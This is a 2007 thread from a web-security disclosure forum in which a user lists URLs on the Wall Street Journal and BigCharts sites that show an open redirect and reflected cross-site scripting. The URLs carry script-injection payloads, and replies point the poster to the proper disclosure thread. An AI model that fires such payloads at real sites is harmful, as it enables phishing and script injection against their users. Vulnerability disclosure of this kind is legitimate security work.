sla.ckers.org is ha.ckers sla.cking
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Some findings
Posted by: inzel
Date: August 23, 2007 01:40PM

Here are some links to some findings Spyware and I found.

http://online.wsj.com/wsjgate?source=nojs&URI=http://google.com - Phishing redirect

http://online.wsj.com/public/search/page/3_0466.html?KEYWORDS=%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E - XSS

http://online.wsj.com/public/quotes/main.html?type=usstock+usfund&mod=hpp_us_indexes&symbol=</script>%3Cscript%3Ealert(1337)%3C/script%3E - XSS

http://chart.bigcharts.com/custom/wsjie/wsjie-nshsm-frontpage-indxchart.img?sid=33333333333333333333333333333333333 - Overflow

http://chart.bigcharts.com/custom/wsjie/wsjie-nshsm-frontpage-indxchart.img?sid=%3Cscript%3Ealert(1234)%3C/script%3E - Still trying to get it to spit the source...


Anyways, nothing special. Just wanted to post it to post it. :)


--inzel--

Re: Some findings
Posted by: Spyware
Date: August 23, 2007 04:39PM

Ehr, :P.

The XSSes you find are supposed to be posted in the big topic in "full disclosure". And the "overflow" isn't an overflow, it's a bug, remember.

Ah well, I'll catch you later on msn or something.

*he's new*

Re: Some findings
Posted by: inzel
Date: August 24, 2007 06:25AM

Meh, sry about that. He's right... I'm brand new ;)


--inzel--

Re: Some findings
Posted by: id
Date: August 24, 2007 09:45AM

YOU WILL BURN IN HELL FOR YOUR TRANSGRESSIONS!!

or just don't do it again please.

-id
